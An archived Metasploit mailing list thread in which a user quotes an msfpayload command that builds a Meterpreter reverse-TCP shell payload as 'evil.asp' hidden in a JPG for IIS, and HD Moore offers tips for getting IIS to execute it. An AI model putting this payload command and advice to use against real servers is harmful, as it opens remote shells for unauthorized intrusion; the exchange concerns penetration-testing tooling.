Metasploit mailing list archives
Re: Microsoft IIS File Parsing bug
From: τ∂υƒιφ * <tas0584 () gmail com>
Date: Thu, 31 Dec 2009 18:32:32 +0530
Oh! Thanks the ASP extension was not enabled on that system. Point noted. I also took the 2 kb image this time. Thanks TAS! 2009/12/31 HD Moore <hdm () metasploit com>:
On 12/31/2009 2:08 AM, τ∂υƒιφ * wrote:Hi, I am trying the "Exploiting Microsoft IIS with Metasploit" I read up on https://www.blogger.com/comment.g?blogID=25010298&postID=7822358000167530780&pli=1 I have tried the following command ./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8443 R | ./msfencode -t asp -o /root/evil.asp This generated the evil.asp. I have also done the cat command and then verified with the file command. I also started the payload handler and verified the settings to ensure I am not making any mistakes. I have two things to ask 1) When I take this evil image and host that on IIS 6.0 I get "Page not found error" , and when I use the same image on IIS 7.0 it actually renders the page. Why is this so?IIS 7.0 may not have the ASP processor loaded, double check the settings (its not on by default). The "404" doesnt make sense, you should at least get a 500 if there is an issue. Something you may want to try is removing the JPG prefix -- some JPG files cause the ASP processor to bail before it reaches the ASP script itself (using a small file has a better chance). -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Microsoft IIS File Parsing bug τ∂υƒιφ * (Dec 31)
- Re: Microsoft IIS File Parsing bug HD Moore (Dec 31)
- Re: Microsoft IIS File Parsing bug τ∂υƒιφ * (Dec 31)
- Re: Microsoft IIS File Parsing bug HD Moore (Dec 31)